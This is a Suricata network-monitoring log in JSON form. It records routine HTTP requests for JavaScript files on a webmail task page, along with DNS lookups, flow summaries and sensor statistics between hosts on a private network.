{"timestamp":"2020-02-29T00:21:52.182051+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.182282+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:21:52.177953+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.191682+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.178406+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:21:52.181046+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:21:52.190156+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:21:52.190323+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.237320+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:21:52.237346+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:21:52.237512+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:54.001526+0000","flow_id":2182554981492520,"event_type":"flow","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":13,"bytes_toserver":2320,"bytes_toclient":11098,"start":"2020-02-29T00:20:47.780072+0000","end":"2020-02-29T00:20:53.446700+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:56.266138+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":3}} {"timestamp":"2020-02-29T00:21:56.275652+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28908,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:56.580929+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26101,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:57.194158+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":1}} {"timestamp":"2020-02-29T00:21:57.196504+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":2}} {"timestamp":"2020-02-29T00:21:58.000193+0000","event_type":"stats","stats":{"uptime":14970,"capture":{"kernel_packets":138459,"kernel_drops":0},"decoder":{"pkts":138517,"bytes":94977633,"invalid":193,"ipv4":136960,"ipv6":10,"ethernet":138517,"raw":0,"null":0,"sll":0,"tcp":131440,"udp":5312,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2857,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2873,"synack":2864,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2431,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2513}},"flow_mgr":{"closed_pruned":2830,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18762,"memcap":0}}} {"timestamp":"2020-02-29T00:22:01.001780+0000","flow_id":2248431190397810,"event_type":"flow","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1118,"start":"2020-02-29T00:20:55.119666+0000","end":"2020-02-29T00:21:00.317204+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:05.000272+0000","event_type":"stats","stats":{"uptime":14977,"capture":{"kernel_packets":138827,"kernel_drops":0},"decoder":{"pkts":138841,"bytes":95215515,"invalid":194,"ipv4":137282,"ipv6":10,"ethernet":138841,"raw":0,"null":0,"sll":0,"tcp":131757,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2861,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2877,"synack":2868,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":771,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:12.000227+0000","event_type":"stats","stats":{"uptime":14984,"capture":{"kernel_packets":139063,"kernel_drops":0},"decoder":{"pkts":139073,"bytes":95413784,"invalid":194,"ipv4":137514,"ipv6":10,"ethernet":139073,"raw":0,"null":0,"sll":0,"tcp":131989,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2863,"ssn_memcap_drop":0,"pseudo":349,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2879,"synack":2870,"rst":1210,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":773,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:19.000183+0000","event_type":"stats","stats":{"uptime":14991,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:20.000826+0000","flow_id":1653011270062210,"event_type":"flow","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:19.118914+0000","end":"2020-02-29T00:17:19.227917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:23.000273+0000","flow_id":24883672652726,"event_type":"flow","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":30,"bytes_toserver":5358,"bytes_toclient":27904,"start":"2020-02-29T00:21:12.072630+0000","end":"2020-02-29T00:21:22.623690+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.001502+0000","flow_id":610635607832318,"event_type":"flow","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2355,"bytes_toclient":3607,"start":"2020-02-29T00:21:17.456446+0000","end":"2020-02-29T00:21:22.599465+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002117+0000","flow_id":764176393698498,"event_type":"flow","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":3359,"bytes_toclient":4267,"start":"2020-02-29T00:21:17.457922+0000","end":"2020-02-29T00:21:22.603314+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002636+0000","flow_id":103172336909697,"event_type":"flow","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1322,"bytes_toclient":1842,"start":"2020-02-29T00:21:17.589185+0000","end":"2020-02-29T00:21:22.603381+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.003183+0000","flow_id":1543210446686322,"event_type":"flow","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1823,"bytes_toclient":2204,"start":"2020-02-29T00:21:17.591986+0000","end":"2020-02-29T00:21:22.601130+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:24.000896+0000","flow_id":1688526354854154,"event_type":"flow","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:23.536842+0000","end":"2020-02-29T00:17:23.645551+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:26.000158+0000","event_type":"stats","stats":{"uptime":14998,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2493,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":18282,"memcap":0}}} 